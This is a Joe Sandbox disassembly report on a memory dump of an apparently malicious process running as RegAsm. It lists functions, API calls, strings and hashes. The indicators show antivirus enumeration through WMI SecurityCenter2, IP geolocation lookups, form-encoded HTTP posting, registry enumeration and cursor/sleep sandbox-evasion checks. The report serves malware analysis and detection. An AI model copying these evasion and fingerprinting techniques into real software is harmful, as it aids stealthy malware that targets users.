Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *NK^K$-NN$/$/F_$4]D$@$B&#6#$Content-Type: application/x-www-form-urlencoded$I-(=($S72'2$S=2>6$e`u`$https://ipgeolocation.io/$https://ipinfo.io/$k$k$k$kn{n$lcog$p$r$|$|
API String ID: 0-3284807517
Opcode ID: a4eb933c22132a099d76f77a8de656241115a02af968f15d5d81f47461b8aa5b
Instruction ID: c7d5bd5d44397f905c05e8a6ae4fdd4f8a32e3fdcd9d0a3d97fe4df541a22c15
Opcode Fuzzy Hash: a4eb933c22132a099d76f77a8de656241115a02af968f15d5d81f47461b8aa5b
Instruction Fuzzy Hash: 04830370D052A88FDB25CB28CC94BEEBBB1AF89304F0481DAD54967242CB796F85CF55

Function 00451720 Relevance: 42.7, APIs: 2, Strings: 21, Instructions: 2466COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00451838
__aulldiv.LIBCMT ref: 004526AD

Strings

:::, xrefs: 0045395B
:, xrefs: 00453A8D
%, xrefs: 00452719
:, xrefs: 00452CE9
:, xrefs: 004534DE
:, xrefs: 004533BB
:, xrefs: 00452AA3
:, xrefs: 00452F2F
:, xrefs: 00453DF6
:, xrefs: 00453298
:, xrefs: 00453BB0
:, xrefs: 00453724
:, xrefs: 0045403C
:, xrefs: 00452BC6
:, xrefs: 00453F19
:, xrefs: 00452E0C
:, xrefs: 00453847
:, xrefs: 00453CD3
:, xrefs: 00453601
:, xrefs: 00453052
:, xrefs: 00453175

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:::
API String ID: 3732870572-4246453620
Opcode ID: c18fa04924d531576c8b28d82549ab37b7a6970473c17938a2ee201c938c722a
Instruction ID: f115d8c10725fef486f73ebf3abac10adfbb27f38f5e9dcadf0ac8c245414fd8
Opcode Fuzzy Hash: c18fa04924d531576c8b28d82549ab37b7a6970473c17938a2ee201c938c722a
Instruction Fuzzy Hash: 474338709042688BCB25DF25CC91BEEBBB5AF45309F0441DED54AAB242DB346F88CF59

Function 00430740 Relevance: 29.2, APIs: 13, Strings: 3, Instructions: 1186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 0043088A
__aulldiv.LIBCMT ref: 00430B99

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__fread_nolock.LIBCMT ref: 00430C3F
__aulldiv.LIBCMT ref: 00430CAB

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00430DE5
__aulldiv.LIBCMT ref: 00430F1A
__aulldiv.LIBCMT ref: 004310DA
__fread_nolock.LIBCMT ref: 00431131

Strings

eks, xrefs: 004308B0
u, xrefs: 0043099A
j3l6lrek, xrefs: 0043093F, 0043097A

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$__fread_nolock
String ID: eks$j3l6lrek$u
API String ID: 3493607940-2906203254
Opcode ID: 4b25fa690cb6031b03eea203296c0b7868b516ef5e5c922917b617c779054669
Instruction ID: ed82bb78abdf7bbcf2c54842750a728aaef47426149999f07c8a46fe1ccb441f
Opcode Fuzzy Hash: 4b25fa690cb6031b03eea203296c0b7868b516ef5e5c922917b617c779054669
Instruction Fuzzy Hash: 13B2C0B1E002189FDB24DB64CC91BEEBBB5BF89304F0481A9E509A7391DB346E85CF55

Function 004317E0 Relevance: 29.2, APIs: 13, Strings: 3, Instructions: 1186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 0043192A
__aulldiv.LIBCMT ref: 00431C39

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__fread_nolock.LIBCMT ref: 00431CDF
__aulldiv.LIBCMT ref: 00431D4B

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00431E85
__aulldiv.LIBCMT ref: 00431FBA
__aulldiv.LIBCMT ref: 0043217A
__fread_nolock.LIBCMT ref: 004321D1

Strings

eks, xrefs: 00431950
j3l6lrek, xrefs: 004319DF, 00431A1A
(ZJ, xrefs: 00431A6B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$__fread_nolock
String ID: (ZJ$eks$j3l6lrek
API String ID: 3493607940-3988229910
Opcode ID: d83ad16072a8572a1aaf4ca098f82bfb11dcfed48d10112301351ecbd305db73
Instruction ID: 3febfb47fdc92599cddc4016dfe3e7c600fe40ff91a5eff04d31f94f3ff2dda5
Opcode Fuzzy Hash: d83ad16072a8572a1aaf4ca098f82bfb11dcfed48d10112301351ecbd305db73
Instruction Fuzzy Hash: 87B2D0B1E002189FDB24DB64CC91BEEBBB5BF89304F1481A9E409A7391DB346E85CF55

Function 00433600 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0043360D
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00433633
CoUninitialize.OLE32 ref: 00433642

Strings

%ws, xrefs: 00433873
Select * From AntiVirusProduct, xrefs: 00433725
WQL, xrefs: 00433756
ROOT\SecurityCenter2, xrefs: 00433698
displayName, xrefs: 00433844

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize$SecurityUninitialize
String ID: %ws$ROOT\SecurityCenter2$Select * From AntiVirusProduct$WQL$displayName
API String ID: 3757020523-4229669714
Opcode ID: c67cd6453a7068374fb33b74f0bf6fb915a2f14b00f39174ba8a3a221c5ae9b0
Instruction ID: 248eaa1abccf262ec5addea588efc0091001d51c6a96fc74f562b6610ee92897
Opcode Fuzzy Hash: c67cd6453a7068374fb33b74f0bf6fb915a2f14b00f39174ba8a3a221c5ae9b0
Instruction Fuzzy Hash: 08A1F7B4E00209EFDB14DF94C985BEEBBB5BB48305F20815AE5126B390D7B86A45CF54

Function 00434D40 Relevance: 22.5, APIs: 3, Strings: 9, Instructions: 1456COMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 004357F0
__aulldiv.LIBCMT ref: 00435B48
__aulldiv.LIBCMT ref: 00435EA4

Strings

eks, xrefs: 00434D59, 004363A1
~mxl, xrefs: 00435C77
m, xrefs: 004358E3
b, xrefs: 0043558F
j3l6lrek, xrefs: 00434E00, 00434E3B, 00436448, 00436483
w, xrefs: 00434E6F
ongjr, xrefs: 00436241
L85<), xrefs: 00435FC1
q, xrefs: 00434EFA

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: L85<)$b$eks$j3l6lrek$m$ongjr$q$w$~mxl
API String ID: 3732870572-2218426398
Opcode ID: 38ea8c7e54da7cde22b4eebf26d39e595f7d253b2e1e825eb53e309b292cf5b7
Instruction ID: 38a92d830e6c4dd0b9ec2749629d1db253707dd2fe5655ce0909aa02115304b7
Opcode Fuzzy Hash: 38ea8c7e54da7cde22b4eebf26d39e595f7d253b2e1e825eb53e309b292cf5b7
Instruction Fuzzy Hash: 77E26770D042689BDB24DB64CC95BEEBBB5BF49304F0481EAE509A7381DB382E85CF55

Function 00509BD0 Relevance: 20.3, APIs: 10, Strings: 1, Instructions: 1016
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 00509D07
GetModuleHandleA.KERNEL32(?,?,?), ref: 00509E59
GetModuleHandleA.KERNEL32(?,?,?), ref: 00509FAB
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A0FD
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A24F
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A3D7
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A571
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A70B
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A8A5
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050AA3F

Strings

EC, xrefs: 0050A3A5

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID: EC
API String ID: 4139908857-2263498742
Opcode ID: c31d122a47de0a7ce904d1a05562a0db0ea2011487b3a357d3c6ea7ff7baa32b
Instruction ID: 4cfcad33a6ec3e9e5b8220c0090680f0983b62376599e87d6b0b2d17304a9462
Opcode Fuzzy Hash: c31d122a47de0a7ce904d1a05562a0db0ea2011487b3a357d3c6ea7ff7baa32b
Instruction Fuzzy Hash: 22B20270D052688FDB25CF68CC90BEEBBB1BF8A308F1481D9D449AB346D6316A84DF55

Function 0046D6E0 Relevance: 15.6, APIs: 2, Strings: 5, Instructions: 3312COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0046F5AF

Strings

%, xrefs: 0046F61B
), xrefs: 004706AD
', xrefs: 004702D4
3, xrefs: 0047011C
&, xrefs: 0046FB96

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3
API String ID: 3732870572-1175896778
Opcode ID: c2560ca5fedcbbdada6e6cb124eaba24fe4088e8ac62934dc41647b90016c1e9
Instruction ID: d693b51815b6c67d81b492c7bdbd45a3678860fb9b1bd3b496e743534c1d8fd4
Opcode Fuzzy Hash: c2560ca5fedcbbdada6e6cb124eaba24fe4088e8ac62934dc41647b90016c1e9
Instruction Fuzzy Hash: 8C83EF70D052688FCB65CB28CC90BEEBBB1BF89308F0481DAD54DA7252DA356E85CF55

Function 004366C0 Relevance: 15.2, APIs: 2, Strings: 6, Instructions: 1184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l, xrefs: 00436896
eks, xrefs: 00436B7E
:, xrefs: 00436916
F, xrefs: 0043691A
j3l6lrek, xrefs: 00436C25, 00436C60
q, xrefs: 004370AE

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake
String ID: :$F$eks$j3l6lrek$l$q
API String ID: 4258034872-2840958074
Opcode ID: 0fabd542b1519b0ab0cc39865efa22c4cd626f02a9fedd9b45bad23a2dab7b25
Instruction ID: 7cc07ffcf6b3f84739c149508f85475ee936f78321432c080d54a692821b2c2d
Opcode Fuzzy Hash: 0fabd542b1519b0ab0cc39865efa22c4cd626f02a9fedd9b45bad23a2dab7b25
Instruction Fuzzy Hash: 40C288B0D042289BDB24DB64CC91BEEBBB5BF49304F0481EAE50A67341DB386E85CF55

Function 00433BE0 Relevance: 14.9, APIs: 3, Strings: 5, Instructions: 892
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 00433D44
__aulldiv.LIBCMT ref: 00433DFD
__aulldiv.LIBCMT ref: 004344C8

Strings

eks, xrefs: 00434606, 00434831
TUT, xrefs: 00433E56
j3l6lrek, xrefs: 004346A4, 004346DF, 004348D8, 00434913
Content-Type: application/x-www-form-urlencoded, xrefs: 0043450D, 0043454D
=Y\I\, xrefs: 004340B7

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: =Y\I\$Content-Type: application/x-www-form-urlencoded$TUT$eks$j3l6lrek
API String ID: 3732870572-2210028155
Opcode ID: 069fbda315b77a6b9962c6dc8f8bea36429eadaff6d4011824d8ddf049398435
Instruction ID: 0b39270c4957e3cb2ade4fb35155ac2488cd6917109384145b6ef13c4b05bb98
Opcode Fuzzy Hash: 069fbda315b77a6b9962c6dc8f8bea36429eadaff6d4011824d8ddf049398435
Instruction Fuzzy Hash: 60924670D002289FDB24DB69CC95BDEBBB5BF89304F1081DAE409A7291DB346E85CF55

Function 00481580 Relevance: 14.9, APIs: 2, Strings: 5, Instructions: 2639COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00482833

Strings

3, xrefs: 004833A0
&, xrefs: 00482E1A
', xrefs: 00483558
), xrefs: 00483931
%, xrefs: 0048289F

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3
API String ID: 3732870572-1175896778
Opcode ID: e355b7dadc6744a380a60176babf689acf698816c1b8020da62b292756f191c5
Instruction ID: 0034d643212e722d0324f47abe3d7b7ddad9cd6a29112c5330de8d3d63963a63
Opcode Fuzzy Hash: e355b7dadc6744a380a60176babf689acf698816c1b8020da62b292756f191c5
Instruction Fuzzy Hash: 0753F270D052688FCB25DB28CC91BEEBBB5BF89308F0481DAD549A7252DB346E85CF54

Function 0047EB60 Relevance: 14.0, APIs: 2, Strings: 5, Instructions: 1747
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 0047EDAA

Strings

%, xrefs: 0047EE0A
&, xrefs: 0047F2DA
), xrefs: 0047FDA6
', xrefs: 0047F9CD
3, xrefs: 0047F815

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3
API String ID: 3732870572-1175896778
Opcode ID: f0a6a586697c3083da832cb4fa827dce99411200574c8feadcf73ca1ec49d641
Instruction ID: 76545cefedcf0f882da335e4038d0771dff4b3793334e29289a3aa2004b31255
Opcode Fuzzy Hash: f0a6a586697c3083da832cb4fa827dce99411200574c8feadcf73ca1ec49d641
Instruction Fuzzy Hash: AD13F370D052688FCB29DB68CC91BEDBBB5BF49304F0481DAD50AA7252DB346E85CF58

Function 00442970 Relevance: 11.3, APIs: 4, Strings: 2, Instructions: 789
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF

__aulldiv.LIBCMT ref: 00442C37
RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000000,eks), ref: 00442E60
RegOpenKeyExA.KERNEL32(80000001,?,00000000,?,?), ref: 00442CE9

Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1

Strings

eks, xrefs: 00442A54, 00442D2C, 004432C8, 00443303, 00443506, 00443541
j3l6lrek, xrefs: 00442AE9, 00442B24, 00442DC1, 00442DFC, 004433AA, 004433E5, 004435E8, 00443623

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionEnumOpenVariableWake__aulldiv
String ID: eks$j3l6lrek
API String ID: 2427947366-388657971
Opcode ID: fcfbb1846bf8a3f8207199c42c908c7df708a6eae263a41b0eacba31469e2b15
Instruction ID: 08fac814bacb05f198c375bebecb25a3a60c5f102c261e7047808d5fa7220acc
Opcode Fuzzy Hash: fcfbb1846bf8a3f8207199c42c908c7df708a6eae263a41b0eacba31469e2b15
Instruction Fuzzy Hash: BE822270D042289FEB24CFA5C995BEEBBB1BF49304F1081DAE509A7281DB746E85CF54

Function 00440F20 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF

Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1

__aulldiv.LIBCMT ref: 00441245
__aulldiv.LIBCMT ref: 004412B9

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__fread_nolock.LIBCMT ref: 0044144F

Strings

eks, xrefs: 004412FA, 00441329
j3l6lrek, xrefs: 004413B8, 004413E7
"P@, xrefs: 00441070

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock__aulldiv$AcquireRelease$ConditionVariableWake__fread_nolock
String ID: "P@$eks$j3l6lrek
API String ID: 577242060-2889650871
Opcode ID: 6ed594085becb53306a4dad177f5e80e509bf602daaba27cc0f6a25ef9ab9fd4
Instruction ID: 8ab3c6f68b34b0ba270dd6dfddb089e98b0f822792d892a9adaacf0b1e0c687c
Opcode Fuzzy Hash: 6ed594085becb53306a4dad177f5e80e509bf602daaba27cc0f6a25ef9ab9fd4
Instruction Fuzzy Hash: 0AF16C71E002189FEB14DFA4DC51BEEBBB1BF88304F14819AE509A7351D7346A85CF65

Function 00433130 Relevance: 9.3, APIs: 6, Instructions: 343
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCursorPos.USER32(?), ref: 00433143
GetCursorPos.USER32(?), ref: 0043315A
Sleep.KERNEL32(?), ref: 00433310
GetCursorPos.USER32(?), ref: 0043331A
__aulldiv.LIBCMT ref: 004333FD
Sleep.KERNEL32(?), ref: 004335E5

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Cursor$Sleep$__aulldiv
String ID:
API String ID: 1481957275-0
Opcode ID: 4366ffaee9367ffea03055b95ab056999a8278ba8b74c1802e438da7f2f8d238
Instruction ID: 670f10937d811d812307df241510028ea0fda929e8b4377b911cd561125e0c45
Opcode Fuzzy Hash: 4366ffaee9367ffea03055b95ab056999a8278ba8b74c1802e438da7f2f8d238
Instruction Fuzzy Hash: B9F1C574E042189FDB14CF98D890BAEBBB2FF89304F14819AE819A7345D734AA85CF55

Function 0050CCE0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 135
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(00000000,00000000,aaj38,?), ref: 0050CE40
GetProcessHeap.KERNEL32(00000008,-00000001,00000000,aaj38,?), ref: 0050CE63
HeapAlloc.KERNEL32(00000000), ref: 0050CE6A
lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0050CE7F

Strings

aaj38, xrefs: 0050CD49, 0050CD78
38a49, xrefs: 0050CDF2, 0050CE21

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Heap$AllocProcesslstrcpynlstrlen
String ID: 38a49$aaj38
API String ID: 2211197272-4103302207
Opcode ID: f068882d9c4cd9a66d94bf4e1dc83c556ab565109339378980c366f5b14dcdf4
Instruction ID: 08bbaa513fa62d9cccc12bc81a3fcce503bc0ea032a3d737ebf7e79e91738d23
Opcode Fuzzy Hash: f068882d9c4cd9a66d94bf4e1dc83c556ab565109339378980c366f5b14dcdf4
Instruction Fuzzy Hash: 435103B1D04248AFCF04DFE4D898BEEBFB1BF49304F108169E506AB281C7755A85CB94

Function 0042C670 Relevance: 7.8, APIs: 5, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000001), ref: 0042C6C2
GetLastError.KERNEL32 ref: 0042C6D2
__aulldiv.LIBCMT ref: 0042C732
__aulldiv.LIBCMT ref: 0042C80F
__aulldiv.LIBCMT ref: 0042C935

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$AttributesErrorFileLast
String ID:
API String ID: 3597693367-0
Opcode ID: 1083ba72d6f9da74ff1a1281b331befb0be83b02e0f84e54cb495f8206f5af21
Instruction ID: 45c6bf80a9a4236fa5f333371ff9548f82703451e4799d120c0b858235f38910
Opcode Fuzzy Hash: 1083ba72d6f9da74ff1a1281b331befb0be83b02e0f84e54cb495f8206f5af21
Instruction Fuzzy Hash: B6A16FB1E04218AFEB24CFA4DC81B9EBBB5BB88714F118169E908B7384D7386D41CF55

Function 00427210 Relevance: 7.2, APIs: 2, Strings: 1, Instructions: 1923libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00424730: __aulldiv.LIBCMT ref: 00424AC6

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042902A
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004291CF

Strings

Ju||i, xrefs: 004274E5

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$__aulldiv
String ID: Ju||i
API String ID: 898380398-1653578089
Opcode ID: 8745cb1ceed82f05b992489eba330a7df14f11b7e072391ca8ee3f29851edf64
Instruction ID: 01edd34a2ff59f6ba276b9c765401dc00774b313d148437bcfa790f6f3787f76
Opcode Fuzzy Hash: 8745cb1ceed82f05b992489eba330a7df14f11b7e072391ca8ee3f29851edf64
Instruction Fuzzy Hash: 4A232870E052688FDB25CF68DC90BEEBBB1BF4A308F1481DAD449AB342D6355A85CF54

Function 0050CA00 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0050C6E0: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050C734

InternetCloseHandle.WININET(00000000), ref: 0050CCA7

Strings

{, xrefs: 0050CBD1

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Internet$CloseHandleOpen
String ID: {
API String ID: 435140893-366298937
Opcode ID: 72c89d0deed0a441a999497de95daab5c3724120d9b3ae71b9a47c57a93df974
Instruction ID: 4ce0df4eb4c6b84b648c5da0d1d41232108de021786f986a04df3d20874892ae
Opcode Fuzzy Hash: 72c89d0deed0a441a999497de95daab5c3724120d9b3ae71b9a47c57a93df974
Instruction Fuzzy Hash: F8A1E1B0D00209DFDB04CFA8C895BEEBFB5BF49304F248659E515AB281D774AA45CFA4

Function 00434B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00434BBD
__aulldiv.LIBCMT ref: 00434C77

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 00434CA4, 00434CD8

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: Content-Type: application/x-www-form-urlencoded
API String ID: 3732870572-2811858139
Opcode ID: 256c77af9c7c86e9d179dca9057c864878d4d8de57262045694d68615f2e01f0
Instruction ID: 9ac544591481852ff1f24b66d42fc835acbe24e5fb17347bccd30f052ea243d4
Opcode Fuzzy Hash: 256c77af9c7c86e9d179dca9057c864878d4d8de57262045694d68615f2e01f0
Instruction Fuzzy Hash: EF613AB1E00208ABDB14DFA9DC55BEEBBB5FF88304F108129E509BB380DB346945CB95

Function 0051CBD0 Relevance: 4.6, APIs: 3, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 0051CC5E
GetLastError.KERNEL32 ref: 0051CC9F
SetLastError.KERNEL32(?,?,00000000,00000001,00000028,?,00000000,00000001,00000008), ref: 0051CD44

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$HandleModule
String ID:
API String ID: 1090667551-0
Opcode ID: bb15006e30f6fc4ad114c43c02281f78c9b151033810da23866ffd457616cdb5
Instruction ID: 97641b7349625e1fc39116a3fc008556c34bd63661c16a7afda32eddf8c500ec
Opcode Fuzzy Hash: bb15006e30f6fc4ad114c43c02281f78c9b151033810da23866ffd457616cdb5
Instruction Fuzzy Hash: 5451FFB5E08288AFDF04DBF99C45AEEBFF56F49200F0484AEF555E7282E53846048B61

Function 0051CE70 Relevance: 3.2, APIs: 2, Instructions: 150COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(000005B6), ref: 0051CF1F
GetModuleHandleA.KERNEL32(00000000), ref: 0051CFFE

Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF

Part of subcall function 0051CBD0: GetModuleHandleA.KERNEL32(00000000), ref: 0051CC5E
Part of subcall function 0051CBD0: GetLastError.KERNEL32 ref: 0051CC9F

Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
